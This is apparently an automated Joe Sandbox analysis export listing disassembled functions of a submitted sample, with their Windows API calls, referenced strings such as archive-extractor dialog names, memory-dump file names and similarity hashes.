Instruction Fuzzy Hash: 12414D71900289AFCF16EF95CD85AEEBBB5FF48304F188059FA0467211D335AA50DB64

Function 00DC7401 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 103COMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 00DC7406

Part of subcall function 00DC3BBA: __EH_prolog.LIBCMT ref: 00DC3BBF

GetLastError.KERNEL32(?,?,00000800,?,?,?,00000000,00000000), ref: 00DC74CD

Part of subcall function 00DC7A9C: GetCurrentProcess.KERNEL32(00000020,?), ref: 00DC7AAB
Part of subcall function 00DC7A9C: GetLastError.KERNEL32 ref: 00DC7AF1
Part of subcall function 00DC7A9C: CloseHandle.KERNEL32(?), ref: 00DC7B00

Strings

SeSecurityPrivilege, xrefs: 00DC744B
SeRestorePrivilege, xrefs: 00DC7460

Memory Dump Source

Source File: 00000000.00000002.1763183414.0000000000DC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DC0000, based on PE: true

Associated: 00000000.00000002.1763168846.0000000000DC0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1763210072.0000000000DF3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1763229154.0000000000DFE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1763229154.0000000000E05000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1763229154.0000000000E22000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1763280792.0000000000E23000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_dc0000_gkcQYEdJSO.jbxd

Similarity

API ID: ErrorH_prologLast$CloseCurrentHandleProcess
String ID: SeRestorePrivilege$SeSecurityPrivilege
API String ID: 3813983858-639343689
Opcode ID: 9fc4a13560f3866664b278678e433a0cab6fda7eb87659c0902b96076a3ae399
Instruction ID: c46d9400cb8164c05e970abbfd4016f275dd4c2f83fcf9d95088dc3426d77da4
Opcode Fuzzy Hash: 9fc4a13560f3866664b278678e433a0cab6fda7eb87659c0902b96076a3ae399
Instruction Fuzzy Hash: FA31B27190425AAEDF11ABA4DC45FEE7BA9EB05300F08405AF445AB282C7748A88CB71

Function 00DDAD10 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 72COMMON

Download Yara Rule

APIs

Part of subcall function 00DC1316: GetDlgItem.USER32(00000000,00003021), ref: 00DC135A
Part of subcall function 00DC1316: SetWindowTextW.USER32(00000000,00DF35F4), ref: 00DC1370

EndDialog.USER32(?,00000001), ref: 00DDAD98
GetDlgItemTextW.USER32(?,00000066,?,?), ref: 00DDADAD
SetDlgItemTextW.USER32(?,00000066,?), ref: 00DDADC2

Strings

ASKNEXTVOL, xrefs: 00DDAD28

Memory Dump Source

Source File: 00000000.00000002.1763183414.0000000000DC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DC0000, based on PE: true

Associated: 00000000.00000002.1763168846.0000000000DC0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1763210072.0000000000DF3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1763229154.0000000000DFE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1763229154.0000000000E05000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1763229154.0000000000E22000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1763280792.0000000000E23000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_dc0000_gkcQYEdJSO.jbxd

Similarity

API ID: ItemText$DialogWindow
String ID: ASKNEXTVOL
API String ID: 445417207-3402441367
Opcode ID: 8b97aa5e007624c74545f017fbad6ace4e814cd42d6ea6a20d4b7b14bbdd8285
Instruction ID: 5934ffea71100a924d5c4c8b4e3176f2b641b75f560d13fbaca6fb106010be66
Opcode Fuzzy Hash: 8b97aa5e007624c74545f017fbad6ace4e814cd42d6ea6a20d4b7b14bbdd8285
Instruction Fuzzy Hash: B3110B32244200BFD3219F6DDC05F66776AEF5B702F144052F341E76A0D761DA0A9732

Function 00DCD8EC Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 67COMMON

Download Yara Rule

APIs

__fprintf_l.LIBCMT ref: 00DCD954
_strncpy.LIBCMT ref: 00DCD99A

Part of subcall function 00DD1DA7: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,000000FF,00000000,00000200,00000000,00000000,?,00E01030,00000200,00DCD928,00000000,?,00000050,00E01030), ref: 00DD1DC4

Strings

$%s, xrefs: 00DCD949
@%s, xrefs: 00DCD93E

Memory Dump Source

Source File: 00000000.00000002.1763183414.0000000000DC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DC0000, based on PE: true

Associated: 00000000.00000002.1763168846.0000000000DC0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1763210072.0000000000DF3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1763229154.0000000000DFE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1763229154.0000000000E05000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1763229154.0000000000E22000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1763280792.0000000000E23000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_dc0000_gkcQYEdJSO.jbxd

Similarity

API ID: ByteCharMultiWide__fprintf_l_strncpy
String ID: $%s$@%s
API String ID: 562999700-834177443
Opcode ID: dc7b8b6204cd2e5802b27210416dc90d78ff931e95afd4c7bf0601f9dc782aa2
Instruction ID: df01c2150de936a29db8693c5640445d1c999b89eface4116cf9fa29ff5b017c
Opcode Fuzzy Hash: dc7b8b6204cd2e5802b27210416dc90d78ff931e95afd4c7bf0601f9dc782aa2
Instruction Fuzzy Hash: EB21DF3640024DAEDB21EEA4CC05FEE7BA9EF05304F04402AFA54971A2EB32D648CF71

Function 00DD0E46 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 63COMMON

Download Yara Rule

APIs

InitializeCriticalSection.KERNEL32(00000320,00000000,?,?,?,00DCAC5A,00000008,?,00000000,?,00DCD22D,?,00000000), ref: 00DD0E85
CreateSemaphoreW.KERNEL32(00000000,00000000,00000040,00000000,?,?,?,00DCAC5A,00000008,?,00000000,?,00DCD22D,?,00000000), ref: 00DD0E8F
CreateEventW.KERNEL32(00000000,00000001,00000001,00000000,?,?,?,00DCAC5A,00000008,?,00000000,?,00DCD22D,?,00000000), ref: 00DD0E9F

Strings

Thread pool initialization failed., xrefs: 00DD0EB7

Memory Dump Source

Source File: 00000000.00000002.1763183414.0000000000DC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DC0000, based on PE: true

Associated: 00000000.00000002.1763168846.0000000000DC0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1763210072.0000000000DF3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1763229154.0000000000DFE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1763229154.0000000000E05000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1763229154.0000000000E22000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1763280792.0000000000E23000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_dc0000_gkcQYEdJSO.jbxd

Similarity

API ID: Create$CriticalEventInitializeSectionSemaphore
String ID: Thread pool initialization failed.
API String ID: 3340455307-2182114853
Opcode ID: 537f2b245aed37800066becf1efab28951f953aeb0328a9847e3d7e318de1217
Instruction ID: 32262150ffe9ffdd3a493cc4d0e6e794824b4de0539f38f5a74fc7a32bf5c082
Opcode Fuzzy Hash: 537f2b245aed37800066becf1efab28951f953aeb0328a9847e3d7e318de1217
Instruction Fuzzy Hash: E1114FB1640709AFC3215F6A9C84AA7FBECEB95754F548C2FF1DAC6300DA7199408B74

Function 00DDDCDD Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 46COMMON

Download Yara Rule

Strings

RENAMEDLG, xrefs: 00DDDD31
REPLACEFILEDLG, xrefs: 00DDDD1C, 00DDDD50

Memory Dump Source

Source File: 00000000.00000002.1763183414.0000000000DC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DC0000, based on PE: true

Associated: 00000000.00000002.1763168846.0000000000DC0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1763210072.0000000000DF3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1763229154.0000000000DFE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1763229154.0000000000E05000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1763229154.0000000000E22000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1763280792.0000000000E23000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_dc0000_gkcQYEdJSO.jbxd

Similarity

API ID:
String ID: RENAMEDLG$REPLACEFILEDLG
API String ID: 0-56093855
Opcode ID: 838cd9d9cc3681793ce7cd4dc3675edb3255f4e48f3565eddf63417cfb9f761f
Instruction ID: eb43525ae6b12ec14763155c2b3ab9c9f66932537028ad79e0345b2c084c40a0
Opcode Fuzzy Hash: 838cd9d9cc3681793ce7cd4dc3675edb3255f4e48f3565eddf63417cfb9f761f
Instruction Fuzzy Hash: 66019E36604349AFDF108F66FD04EAA7BAAEB08354B044027F945A2331C6328898DBF0

Function 00DE9A1E Relevance: 6.3, APIs: 4, Instructions: 305COMMONLIBRARYCODE

Download Yara Rule

APIs

_strrchr.LIBCMT ref: 00DE9AA9
__alldvrm.LIBCMT ref: 00DE9CAA
__alldvrm.LIBCMT ref: 00DE9CCC

Memory Dump Source

Source File: 00000000.00000002.1763183414.0000000000DC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DC0000, based on PE: true

Associated: 00000000.00000002.1763168846.0000000000DC0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1763210072.0000000000DF3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1763229154.0000000000DFE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1763229154.0000000000E05000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1763229154.0000000000E22000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1763280792.0000000000E23000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_dc0000_gkcQYEdJSO.jbxd

Similarity

API ID: __alldvrm$_strrchr
String ID:
API String ID: 1036877536-0
Opcode ID: 15e7b98f52cb345e5770fd34cbf54b95dbf5428e1727e1497290f0e3bad33655
Instruction ID: 6ed451412c83873da2a190143288508d21d1163504c7ba2692bdad1e4ab4d8cc
Opcode Fuzzy Hash: 15e7b98f52cb345e5770fd34cbf54b95dbf5428e1727e1497290f0e3bad33655
Instruction Fuzzy Hash: D9A136729027C69FEB21EF2AC8A17AEFBE5EF51310F28416DE5859B281C2348941C770

Function 00DCA354 Relevance: 6.1, APIs: 4, Instructions: 127filetimeCOMMON

Download Yara Rule

APIs

CreateFileW.KERNEL32(?,40000000,00000003,00000000,00000003,02000000,00000000,?,?,?,00000800,?,00DC7F69,?,?,?), ref: 00DCA3FA
CreateFileW.KERNEL32(?,40000000,00000003,00000000,00000003,02000000,00000000,?,?,00000800,?,?,00000800,?,00DC7F69,?), ref: 00DCA43E
SetFileTime.KERNEL32(?,00000800,?,00000000,?,?,00000800,?,00DC7F69,?,?,?,?,?,?,?), ref: 00DCA4BF
CloseHandle.KERNEL32(?,?,?,00000800,?,00DC7F69,?,?,?,?,?,?,?,?,?,?), ref: 00DCA4C6

Memory Dump Source

Source File: 00000000.00000002.1763183414.0000000000DC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DC0000, based on PE: true

Associated: 00000000.00000002.1763168846.0000000000DC0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1763210072.0000000000DF3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1763229154.0000000000DFE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1763229154.0000000000E05000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1763229154.0000000000E22000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1763280792.0000000000E23000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_dc0000_gkcQYEdJSO.jbxd

Similarity

API ID: File$Create$CloseHandleTime
String ID:
API String ID: 2287278272-0
Opcode ID: 17169835f399a0fb327b7c6ac961beb1be3af4cd10a6a2cc358dd8ff616a3c0b
Instruction ID: f4697af85c916ff64df84b8919ad0ed07217bc0d842b17f967f96d70906428a5
Opcode Fuzzy Hash: 17169835f399a0fb327b7c6ac961beb1be3af4cd10a6a2cc358dd8ff616a3c0b
Instruction Fuzzy Hash: AD41E130248386AAD731DF68DC55FAEBBE49B80308F08091DF5D4D3280D6A4DA48DB73

Function 00DC1100 Relevance: 6.1, APIs: 4, Instructions: 119COMMON

Download Yara Rule

APIs

_wcslen.LIBCMT ref: 00DC112B
_wcslen.LIBCMT ref: 00DC1153
_wcslen.LIBCMT ref: 00DC1182
_wcslen.LIBCMT ref: 00DC11A9

Memory Dump Source

Source File: 00000000.00000002.1763183414.0000000000DC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DC0000, based on PE: true

Associated: 00000000.00000002.1763168846.0000000000DC0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1763210072.0000000000DF3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1763229154.0000000000DFE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1763229154.0000000000E05000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1763229154.0000000000E22000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1763280792.0000000000E23000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_dc0000_gkcQYEdJSO.jbxd

Similarity

API ID: _wcslen
String ID:
API String ID: 176396367-0
Opcode ID: 97b54a13afd046d21c1d40fb9cdd36b0bd8688ca041e5aab44989e77a2f79514
Instruction ID: 4d22d9b15178c9eef2d985b0f2affc96f32f2349ed777eb4de71828f6a9ae3a9
Opcode Fuzzy Hash: 97b54a13afd046d21c1d40fb9cdd36b0bd8688ca041e5aab44989e77a2f79514
Instruction Fuzzy Hash: 4941B67590066A5FCB219F788C0AEEEBBB8EF41311F04411EF945F7241DA34AE498AB4

Function 00DEC988 Relevance: 6.1, APIs: 4, Instructions: 110COMMONLIBRARYCODE

Download Yara Rule

APIs

MultiByteToWideChar.KERNEL32(?,00000000,?,?,00000000,00000000,00DE91E0,?,00000000,?,00000001,?,?,00000001,00DE91E0,?), ref: 00DEC9D5
MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?), ref: 00DECA5E
GetStringTypeW.KERNEL32(?,00000000,00000000,?,?,?,?,?,?,?,?,?,?,?,00DE6CBE,?), ref: 00DECA70
__freea.LIBCMT ref: 00DECA79

Part of subcall function 00DE8E06: RtlAllocateHeap.NTDLL(00000000,?,00000000,?,00DECA2C,00000000,?,00DE6CBE,?,00000008,?,00DE91E0,?,?,?), ref: 00DE8E38

Memory Dump Source

Source File: 00000000.00000002.1763183414.0000000000DC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DC0000, based on PE: true

Associated: 00000000.00000002.1763168846.0000000000DC0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1763210072.0000000000DF3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1763229154.0000000000DFE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1763229154.0000000000E05000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1763229154.0000000000E22000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1763280792.0000000000E23000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_dc0000_gkcQYEdJSO.jbxd

Similarity

API ID: ByteCharMultiWide$AllocateHeapStringType__freea
String ID:
API String ID: 2652629310-0
Opcode ID: c7d292ba0e6595122a7a9847c7f476862e2bcb64f72641a411d17b79c2ab9479
Instruction ID: 036d72636f5bcc05318f01349aa87afef4ff2812a3d96c813c465718cfb4b580
Opcode Fuzzy Hash: c7d292ba0e6595122a7a9847c7f476862e2bcb64f72641a411d17b79c2ab9479
Instruction Fuzzy Hash: 3631DE32A1024AABDF25EF66CC45DBE7BA5EF41310B094228FC04E6250EB35DD51CBB0

Function 00DDA663 Relevance: 6.0, APIs: 4, Instructions: 19COMMON

Download Yara Rule

APIs

GetDC.USER32(00000000), ref: 00DDA666
GetDeviceCaps.GDI32(00000000,00000058), ref: 00DDA675
GetDeviceCaps.GDI32(00000000,0000005A), ref: 00DDA683
ReleaseDC.USER32(00000000,00000000), ref: 00DDA691

Memory Dump Source

Source File: 00000000.00000002.1763183414.0000000000DC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DC0000, based on PE: true

Associated: 00000000.00000002.1763168846.0000000000DC0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1763210072.0000000000DF3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1763229154.0000000000DFE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1763229154.0000000000E05000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1763229154.0000000000E22000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1763280792.0000000000E23000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_dc0000_gkcQYEdJSO.jbxd

Similarity

API ID: CapsDevice$Release
String ID:
API String ID: 1035833867-0
Opcode ID: 418fea818eb3c1f8e0ec200e0380adaae7942eed8efd4c4e8f17651f2d2d2823
Instruction ID: 1b0448f3d0b0621109a2683dd1b2861fc3d1036e73a987d39c0b7f877a9d255d
Opcode Fuzzy Hash: 418fea818eb3c1f8e0ec200e0380adaae7942eed8efd4c4e8f17651f2d2d2823
Instruction Fuzzy Hash: 43E08C31942B21AFC2301B72AC0DF8B3E14AB15B52F000101FB05B6190DF688A098FB0

Function 00DDA80C Relevance: 5.5, APIs: 2, Strings: 1, Instructions: 237COMMON

Download Yara Rule

APIs

Part of subcall function 00DDA699: GetDC.USER32(00000000), ref: 00DDA69D
Part of subcall function 00DDA699: GetDeviceCaps.GDI32(00000000,0000000C), ref: 00DDA6A8
Part of subcall function 00DDA699: ReleaseDC.USER32(00000000,00000000), ref: 00DDA6B3

GetObjectW.GDI32(?,00000018,?), ref: 00DDA83C

Part of subcall function 00DDAAC9: GetDC.USER32(00000000), ref: 00DDAAD2
Part of subcall function 00DDAAC9: GetObjectW.GDI32(?,00000018,?), ref: 00DDAB01
Part of subcall function 00DDAAC9: ReleaseDC.USER32(00000000,?), ref: 00DDAB99

Strings

(, xrefs: 00DDA9AA

Memory Dump Source

Source File: 00000000.00000002.1763183414.0000000000DC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DC0000, based on PE: true

Associated: 00000000.00000002.1763168846.0000000000DC0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1763210072.0000000000DF3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1763229154.0000000000DFE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1763229154.0000000000E05000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1763229154.0000000000E22000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1763280792.0000000000E23000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_dc0000_gkcQYEdJSO.jbxd

Similarity

API ID: ObjectRelease$CapsDevice
String ID: (
API String ID: 1061551593-3887548279
Opcode ID: ebf95a2dc11ad92d7ae0e0fbbd2315848c14c27b6baa12a8e523e7f462473fd8
Instruction ID: 3d7397ff0d0ff6c7460bdeeefbdad94dd891189f00feecd8f6666e45063be7f1
Opcode Fuzzy Hash: ebf95a2dc11ad92d7ae0e0fbbd2315848c14c27b6baa12a8e523e7f462473fd8
Instruction Fuzzy Hash: FA91D175604355AFD620DF29D84492BBBE8FF89700F01891EF99AD3360DB30A946CF62

Function 00DC75DE Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 137timeCOMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 00DC75E3

Part of subcall function 00DD05DA: _wcslen.LIBCMT ref: 00DD05E0

Part of subcall function 00DCA56D: FindClose.KERNELBASE(00000000,000000FF,?,?), ref: 00DCA598

SetFileTime.KERNEL32(?,?,?,?,?,00000005,?,00000011,?,?,00000000,?,0000003A,00000802), ref: 00DC777F

Part of subcall function 00DCA4ED: SetFileAttributesW.KERNELBASE(?,00000000,00000001,?,00DCA325,?,?,?,00DCA175,?,00000001,00000000,?,?), ref: 00DCA501
Part of subcall function 00DCA4ED: SetFileAttributesW.KERNEL32(?,00000000,?,?,00000800,?,00DCA325,?,?,?,00DCA175,?,00000001,00000000,?,?), ref: 00DCA532

Strings

:, xrefs: 00DC7654

Memory Dump Source

Source File: 00000000.00000002.1763183414.0000000000DC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DC0000, based on PE: true

Associated: 00000000.00000002.1763168846.0000000000DC0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1763210072.0000000000DF3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1763229154.0000000000DFE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1763229154.0000000000E05000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1763229154.0000000000E22000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1763280792.0000000000E23000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_dc0000_gkcQYEdJSO.jbxd

Similarity

API ID: File$Attributes$CloseFindH_prologTime_wcslen
String ID: :
API String ID: 3226429890-336475711
Opcode ID: ef8494c5fb76fe5359f163ceb36f5a01b9e1ba12889c3ced4004ed0e6bf045af
Instruction ID: 6ddf60077e27d00ff1f1a465955890ee16b8274b835d8c8659753787405f2539
Opcode Fuzzy Hash: ef8494c5fb76fe5359f163ceb36f5a01b9e1ba12889c3ced4004ed0e6bf045af
Instruction Fuzzy Hash: 0A416271800159AAEB25EB64CC5AFEEB77CEF45300F04809AB609A7192DB749F85CF70

Function 00DDB48E Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 77COMMON

Download Yara Rule

APIs

_wcslen.LIBCMT ref: 00DDB4E3
_wcslen.LIBCMT ref: 00DDB4FE

Strings

}, xrefs: 00DDB4D6

Memory Dump Source

Source File: 00000000.00000002.1763183414.0000000000DC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DC0000, based on PE: true

Associated: 00000000.00000002.1763168846.0000000000DC0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1763210072.0000000000DF3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1763229154.0000000000DFE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1763229154.0000000000E05000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1763229154.0000000000E22000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1763280792.0000000000E23000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_dc0000_gkcQYEdJSO.jbxd

Similarity

API ID: _wcslen
String ID: }
API String ID: 176396367-4239843852
Opcode ID: 2a11eb4a4d66c686a6d9d96a3ff9c68b1e6994161548615f42a04c3afffe0c6c
Instruction ID: 585ff666fef51e24a688bc49013c7973179a7854f5b831d02bb512cabbf4f807
Opcode Fuzzy Hash: 2a11eb4a4d66c686a6d9d96a3ff9c68b1e6994161548615f42a04c3afffe0c6c
Instruction Fuzzy Hash: 0D21D4729043469AD731EA64E845F6FB3ECDF91768F0A042BF540C3341E764D94883B2

Function 00DDDDA0 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 69COMMON

Download Yara Rule

APIs

DialogBoxParamW.USER32(GETPASSWORD1,00010466,00DDB270,?,?), ref: 00DDDE18

Strings

xz, xrefs: 00DDDE28
GETPASSWORD1, xrefs: 00DDDE0D

Memory Dump Source

Source File: 00000000.00000002.1763183414.0000000000DC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DC0000, based on PE: true

Associated: 00000000.00000002.1763168846.0000000000DC0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1763210072.0000000000DF3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1763229154.0000000000DFE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1763229154.0000000000E05000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1763229154.0000000000E22000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1763280792.0000000000E23000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_dc0000_gkcQYEdJSO.jbxd

Similarity

API ID: DialogParam
String ID: GETPASSWORD1$xz
API String ID: 665744214-3234807970
Opcode ID: b00be759589430fa44037a6a43e698c841f1b4bb7972f7a3286d40a737296d7d
Instruction ID: 7679963bb272d75bef8a389d356bdd88c93aa394672b127b178e9f7534842f31
Opcode Fuzzy Hash: b00be759589430fa44037a6a43e698c841f1b4bb7972f7a3286d40a737296d7d
Instruction Fuzzy Hash: 8A110832600244AEDF219B34AC02FAB3799AB49751F184566FA85BB2C1C6B5ACC8C774

Function 00DCF344 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 67COMMON

Download Yara Rule

APIs

Part of subcall function 00DCF2C5: GetProcAddress.KERNEL32(00000000,CryptProtectMemory), ref: 00DCF2E4
Part of subcall function 00DCF2C5: GetProcAddress.KERNEL32(00E081C8,CryptUnprotectMemory), ref: 00DCF2F4

GetCurrentProcessId.KERNEL32(?,?,?,00DCF33E), ref: 00DCF3D2

Strings

CryptProtectMemory failed, xrefs: 00DCF389
CryptUnprotectMemory failed, xrefs: 00DCF3CA

Memory Dump Source

Source File: 00000000.00000002.1763183414.0000000000DC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DC0000, based on PE: true

Associated: 00000000.00000002.1763168846.0000000000DC0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1763210072.0000000000DF3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1763229154.0000000000DFE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1763229154.0000000000E05000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1763229154.0000000000E22000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1763280792.0000000000E23000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_dc0000_gkcQYEdJSO.jbxd

Similarity

API ID: AddressProc$CurrentProcess
String ID: CryptProtectMemory failed$CryptUnprotectMemory failed
API String ID: 2190909847-396321323
Opcode ID: 1524cd6695730151119875936c25e575cf3c99ec1607ad0e6373b9186b51280b
Instruction ID: 1cab48b331ea51423bcd2772c144b217b0d8fe42749f6d115b2f8ce7be853801
Opcode Fuzzy Hash: 1524cd6695730151119875936c25e575cf3c99ec1607ad0e6373b9186b51280b
Instruction Fuzzy Hash: B811063160176A7BDF119F21DD41FAE3B56FF04720B05816EFC81AB291DA31DD4186B4

Function 00DCB991 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 62COMMON

Download Yara Rule

APIs

_swprintf.LIBCMT ref: 00DCB9B8

Part of subcall function 00DC4092: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 00DC40A5

Strings

%c:\, xrefs: 00DCB9AE

Memory Dump Source

Source File: 00000000.00000002.1763183414.0000000000DC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DC0000, based on PE: true

Associated: 00000000.00000002.1763168846.0000000000DC0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1763210072.0000000000DF3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1763229154.0000000000DFE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1763229154.0000000000E05000.00000004.00000001.01000000.00000003.sdmpDownload File
